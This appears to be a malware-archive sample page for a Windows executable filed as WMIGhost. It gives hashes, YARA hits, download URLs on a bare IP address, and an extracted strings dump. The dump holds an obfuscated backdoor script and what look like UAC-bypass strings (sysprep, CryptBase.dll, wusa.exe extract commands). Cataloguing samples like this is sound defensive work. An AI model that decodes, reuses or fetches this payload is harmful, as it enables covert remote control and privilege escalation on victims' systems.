Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: 1b83b315b7a729cb685270496ae68802 --

Hashes
MD5: 1b83b315b7a729cb685270496ae68802
SHA1: 8d8d24b25d9102d620038440ce0998e7fc8d0331
SHA256: 05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83
SSDEEP: 768:j5QGuIOFwKTMAj3cdXhwlMgiR+hYHAGQ:VsIOFwKT/BlMg5WQ
Details
File Type: PE32
Yara Hits
YRP/Armadillo_v171 | YRP/Microsoft_Visual_Cpp_v60 | YRP/Installer_VISE_Custom_additional | YRP/Microsoft_Visual_Cpp_v50v60_MFC_additional | YRP/Microsoft_Visual_Cpp_50 | YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/Armadillo_v171_additional | YRP/Installer_VISE_Custom | YRP/Armadillo_v4x | YRP/Microsoft_Visual_Cpp | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasRichSignature | YRP/domain | YRP/contentis_base64 | YRP/Misc_Suspicious_Strings | YRP/anti_dbg | YRP/win_files_operation |
Source
http://94.130.104.170/05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83
http://94.130.104.170/WMIGhost//05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83
http://94.130.104.170/WMIGhost/05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83
Strings
		!This program cannot be run in DOS mode.
Rich0x
`.rdata
@.data
t4hdu@
_9= {@
YYh `@
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
t.;t$$t(
VC20XC00U
VWuBh4T@
[ShDT@
"WWSh@T@
^VhDT@
PVh@T@
runtime error 
TLOSS error
SING error
DOMAIN error
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
abnormal program termination
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program: 
<program name unknown>
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
WinExec
GetTempPathA
MoveFileA
DeleteFileA
GetTempFileNameA
GetModuleFileNameA
LockResource
SizeofResource
LoadResource
FindResourceA
CloseHandle
WriteFile
CreateFileA
WaitForSingleObject
CreateProcessA
GetSystemDirectoryA
lstrcatA
GetLastError
KERNEL32.dll
wsprintfA
USER32.dll
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
ExitProcess
HeapAlloc
HeapFree
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetCurrentThreadId
TlsSetValue
TlsAlloc
SetLastError
TlsGetValue
HeapDestroy
HeapCreate
VirtualFree
RtlUnwind
InitializeCriticalSection
EnterCriticalSection
LeaveCriticalSection
VirtualAlloc
HeapReAlloc
GetCPInfo
GetACP
GetOEMCP
GetProcAddress
LoadLibraryA
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
}nuxortu;~3~7o2`mzi;u&9lruv|voh!`rvk~ihtuzortuW~m~w&rvk~ihtuzo~f:GGGG5GGittoGGhnyhxirkortu97i&\~oTyq~xo3u09!Zxorm~Hxirko^m~uoXtuhnv~i925hkzluruhozux~D32 i5uzv~&9Kity~Hxirko]ruo97i5hxirkoru|~u|ru~&9qzmzhxirko97i5HxirkoO~co&o09mzi;hTlu~i&<90~09< mzi;VZRU&}nuxortu32`?&osrh ?5p~b&<L< ?5h]~~
Niw&hCvwNiw ?5hTlu~i&hTlu~i ?5hCvwNiw&<< ?5tSook&unww ?5tHs~ww&unww ?5tHoi~zv&unww ?5hSthoUzv~&unww ?5hTHObk~&unww ?5hVzxZ
i~hh&unww ?5hNIWKzizv&unww ?5m~ihrtu&<)5+5+< ?5inuorv~&.+++ ?5tLVR&unww ?5Dc&Zxorm~CTyq~xo f VZRU5kitotobk~&`RuroTyq~xoh!}nuxortu32`?5tLVR&\~oTyq~xo3<lruv|voh!`rvk~ihtuzortuW~m~w&rvk~ihtuzo~f:GGGGGGGG5GGGGittoGGGGxrvm)<2 ?5tHs~ww&u~l;?5Dc3<LHxirko5Hs~ww<2 ?5tHoi~zv&u~l;?5Dc3<Z_T_Y5Hoi~zv<2 ?5\~oTHRu}t32 ?5\~oVzxZ
i~hh32 ?5\~u~izo~NiwKzizv32 f7LVR!}nuxortu3hjw2`i~oniu;?5tLVR5^c~xJn~ib3hjw2 f7\~oTHRu}t!}nuxortu32`mzi;~&u~l;^unv~izoti3?5LVR3<H~w~xo;1;}itv;Lru()DTk~izoru|Hbho~v<22 r}3:~5zo^u
322`mzi;ro~v&~5ro~v32 ?5hTHObk~&ro~v5Xzkortu0ro~v5H~imrx~KzxpVzqtiM~ihrtu ?5hSthoUzv~&ro~v5XHUzv~ ff7\~oVzxZ
i~hh!}nuxortu32`mzi;~&u~l;^unv~izoti3?5LVR3<H~w~xo;1;}itv;Lru()DU~oltipZ
zko~i;ls~i~;KUK_~mrx~R_;wrp~;GGG9>KXR>GGG9;zu
;U~oXtuu~xortuHozonh&)<22 r}3:~5zo^u
322`?5hVzxZ
i~hh&~5ro~v325VZXZ
i~hh ff7\~u~izo~NiwKzizv!}nuxortu32`mzi;orv~&u~l;_zo~32 ?5hNIWKzizv&<xhobk~&h~im~i=znosuzv~&h~im~iuzv~=znoskzhh&h~im~ikzhh=sthouzv~&<0?5hSthoUzv~0<=thobk~&<0?5hTHObk~0<=vzxz
i&<0?5hVzxZ
i~hh0<=tlu~i&<0?5hTlu~i0<=m~ihrtu&<0?5m~ihrtu0<=inuorv~&<0?5inuorv~ ?5hNIWKzizv0&<=o&<0orv~5|~oVruno~h320orv~5|~oH~xtu
h32 f7Xw~zuTyq~xoh!}nuxortu32`?5tHs~ww&unww ?5tHoi~zv&unww mzi;~&u~l;^unv~izoti3?5LVR3<H~w~xo;1;}itv;Lru()DKitx~hh;ls~i~;Uzv~&GGG9hxixtuh5~c~GGG9<22 lsrw~3:~5zo^u
322`~5ro~v325o~ivruzo~32 ~5vtm~U~co32 ff7_~xt
~!}nuxortu3htnix~Hoi2`mzi;p~bxt
~&htnix~Hoi5xsziXt
~Zo3+2 mzi;htnix~&htnix~Hoi5hnyhoi3*2 mzi;mzwh&htnix~5hkwro3<7<2 mzi;i~hnwo&<< }ti3mzi;r&+ r'mzwh5w~u|os r002`i~hnwo0&Hoiru|5}itvXsziXt
~3mzwh@rFEp~bxt
~2 fi~oniu;i~hnwo f7xrixw~_~xt
~!}nuxortu3hx2`mzi;yzh~&hx5xsziXt
~Zo3+2 mzi;h&yzh~6() mzi;i&<< }ti3mzi;r&* r'hx5w~u|os r002`mzi;ux&hx5xsziXt
~Zo3r26h6r0* r}3ux'()2`ux&*)-03ux6()2>"/ fi0&Hoiru|5}itvXsziXt
~3ux2 fi~oniu;i f7VzruWttk!}nuxortu32`?5tSook&u~l;?5Dc3<Vrxitht}o5CvwSook<2 mzi;}~~
NiwZiib&?5h]~~
Niw5hkwro3< <2 mzi;hozio&u~l;_zo~32 mzi;tCvw&u~l;Zxorm~CTyq~xo3<VHCVW)5_TV_txnv~uo5(5+<2 }ti3mzi;u&+ u'}~~
NiwZiib5w~u|os u002`mzi;NiwWrho&u~l;Ziizb32 mzi;NIWunv&+ oib`mzi;ohoi&}~~
NiwZiib@uF5vzoxs3<sook!4451$GGGG5ksk<2 r}3ohoi:&unww2`NiwWrho@NIWunv00F&ohoi f~wh~`?5tSook5Tk~u3<\^O<7}~~
NiwZiib@uF7}zwh~2 ?5tSook5h~oI~jn~hoS~z
~i3<Nh~i6Z|~uo<7<Vtarwwz4.5+;3Lru
tlh ;N ;Lru
tlh;UO;.5* ;im!*5"5*2;\~xpt4)++"+-)/;]ri~}tc4(5.<2 ?5tSook5H~u
32 mzi;i~hktuh~&?5tSook5I~hktuh~O~co5i~kwzx~343EGGh12g3GGh1?24|7<<2 mzi;i~&4'orow~%[3512['GG4orow~%04| mzi;orow~Wrho&i~hktuh~5vzoxs3i~2 }ti3mzi;r&+ r'orow~Wrho5w~u|os r002`oib`tCvw5wtz
CVW3orow~Wrho@rF2 mzi;xtuozru~i&tCvw5|~o^w~v~uohYbOz|Uzv~3<orow~<2 mzi;ovkhoi&xtuozru~i@+F5o~co5vzoxs3<[3512[<2 NiwWrho@NIWunv00F&?5xrixw~_~xt
~3ovkhoi@*F2 fxzoxs3~2`fff}ti3mzi;Niwru
~c&+ Niwru
~c'NiwWrho5w~u|os Niwru
~c002`?5hCvwNiw&NiwWrho@Niwru
~cF mzi;inuunv&(-+ lsrw~3inuunv66%+2`?5tSook5Tk~u3<KTHO<7?5hCvwNiw7}zwh~2 ?5tSook5h~oI~jn~hoS~z
~i3<XTUO^UO6OBK^<7<zkkwrxzortu4c6lll6}tiv6niw~uxt
<2 ?5tSook5H~u
3?5hNIWKzizv2 mzi;i~hktuh~&?5tSook5I~hktuh~O~co5i~kwzx~343EGGh12g3GGh1?24|7<<2 r}3i~hktuh~5w~u|os%+2`mzi;xtvvzu
h&unww mzi;xtuozru~i oib`tCvw5wtz
CVW3i~hktuh~2 xtuozru~i&tCvw5|~o^w~v~uohYbOz|Uzv~3<
rm<2 }ti3mzi;r&+ r'xtuozru~i5w~u|os r002`r}3xtuozru~i@rF5|~oZooiryno~3<r
<2&&<+z..)y.z/(.)<2`xtvvzu
h&~mzw3<3<0xtuozru~i@rF5o~co0<2<25xtvvzu
 fffxzoxs3~2`fr}3xtvvzu
h:&unww2`mzi;xtvvzu
i~hnwo&<< }ti3mzi;r&+ r'xtvvzu
h5w~u|os r002`mzi;i~hnwo&<ut;i~hktuh~< oib`i~hnwo&~mzw3?5_~xt
~3xtvvzu
h@rF5mzwn~22 fxzoxs3~2`fr}3r%+2`xtvvzu
i~hnwo0&<7< fxtvvzu
i~hnwo0&<GG<<0xtvvzu
h@rF5r
0<GG<!GG<<0~hxzk~3i~hnwo20<GG<< fr}3xtvvzu
i~hnwo5w~u|os%+2`xtvvzu
i~hnwo&<`<0xtvvzu
i~hnwo0<f< ?5tSook5Tk~u3<KTHO<7?5hCvwNiw7}zwh~2 ?5tSook5h~oI~jn~hoS~z
~i3<XTUO^UO6OBK^<7<zkkwrxzortu4c6lll6}tiv6niw~uxt
<2 ?5tSook5H~u
3?5hNIWKzizv0<=xtvvzu
&i~hnwo=xtvvzu
i~hnwo&<0xtvvzu
i~hnwo2 ff~wh~`?5hCvwNiw&<< inuunv&+ ff?5inuorv~&3u~l;_zo~3225|~oOrv~326hozio5|~oOrv~32 LHxirko5Hw~~k3*++++2 fr}3?5hCvwNiw5w~u|os%+2`i~oniu fffxzoxs3~2`fff7]ri~!}nuxortu32`?5RuroTyq~xoh32 oib`?5VzruWttk32 fxzoxs3~2`f?5Xw~zuTyq~xoh32 ff u~l;VZRU325]ri~32 9 mzi;r&i5KnoD32 i&\~oTyq~xo3u09!DDRuo~imzwOrv~iRuhoinxortu925hkzluruhozux~D327i5Orv~ir
&9Kity~Hxirko]ruo97i5Ruo~imzwY~ol~~u^m~uoh&-~(7i5KnoD327i&\~oTyq~xo3u09!DD^m~uo]rwo~i925hkzluruhozux~D327i5uzv~&9Kity~Hxirko]ruo97i5Jn~ib&<h~w~xo;1;}itv;DDorv~i~m~uo;ls~i~;orv~ir
&9Kity~Hxirko]ruo9<7i5Jn~ibWzu|nz|~&9LJW9 mzi;h&i5KnoD32 i~oniu;i&\~oTyq~xo3u09!DD]rwo~iOtXtuhnv~iYru
ru|925HkzluRuhozux~D327i5Xtuhnv~i&r5kzos7i5]rwo~i&h5kzos7i5KnoD32799f ~39kx97<mzi;hCvwNiw&9sook!44pnvzi#+,5ywt|hkto5xtv4}~~
h4kthoh4
~}znwo sook!44pnvzi#+,5lti
ki~hh5xtv4}~~
4 sook!44pnvzi#+,5wrm~qtniuzw5xtv4
zoz4ihh sook!44ywt|h5i~
r}}5xtv4pnvzi#+,4}~~
4 sook!44pnvzi#+,5ostn|soh5xtv4}~~
 sook!44pnvzi#+,5onvywi5xtv4ihh 9 <2 
gupdate.exe
%s\%s\%s%s %s
cmd.exe
%s\%s /c %s
cmd.exe
%s\%s /c %s
IDR_RESOURCE
gupdate.exe
\cmd.exe
IDR_RESOURCE
IDR_RESOURCE
\cmd.exe
%s%s.dll.cab
wusa.exe
/c %s %s /quiet /extract:%s\%s\
sysprep
CryptBase
SysNative
%s\%s\%s%s
%s\%s\%s%s
CryptBase.dll
kp,s{h
CryptBase.dll
85&?)+
!This program cannot be run in DOS mode.
`.rdata
@.data
DeleteFileA
InitializeCriticalSection
DeleteCriticalSection
OutputDebugStringA
LeaveCriticalSection
CloseHandle
SetFileTime
SystemTimeToFileTime
GetSystemTime
WriteFile
SetFilePointer
CreateFileA
GetSystemDirectoryA
EnterCriticalSection
GetFileAttributesA
MultiByteToWideChar
InterlockedDecrement
WaitForSingleObject
CreateProcessA
MoveFileA
GetTempPathA
GetModuleFileNameA
KERNEL32.dll
strlen
strcat
sprintf
_strtime
_vsnprintf
??2@YAPAXI@Z
__CxxFrameHandler
??3@YAXPAX@Z
memset
_beginthread
malloc
strcpy
MSVCRT.dll
__dllonexit
_onexit
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
CoInitialize
CoCreateInstance
ole32.dll
OLEAUT32.dll
??0Init@ios_base@std@@QAE@XZ
??1Init@ios_base@std@@QAE@XZ
??0_Winit@std@@QAE@XZ
??1_Winit@std@@QAE@XZ
MSVCP60.dll
GetModuleHandleA
GetStartupInfoA
LocalFree
_CxxThrowException
??1type_info@@UAE@XZ
aaaaaaaa
YYYYYYYYYYYYYYYY
[%s] - %s
\httpcom.log
Script Error
Run OK
create process:%s
process[%s] end
.?AV_com_error@@
.?AVtype_info@@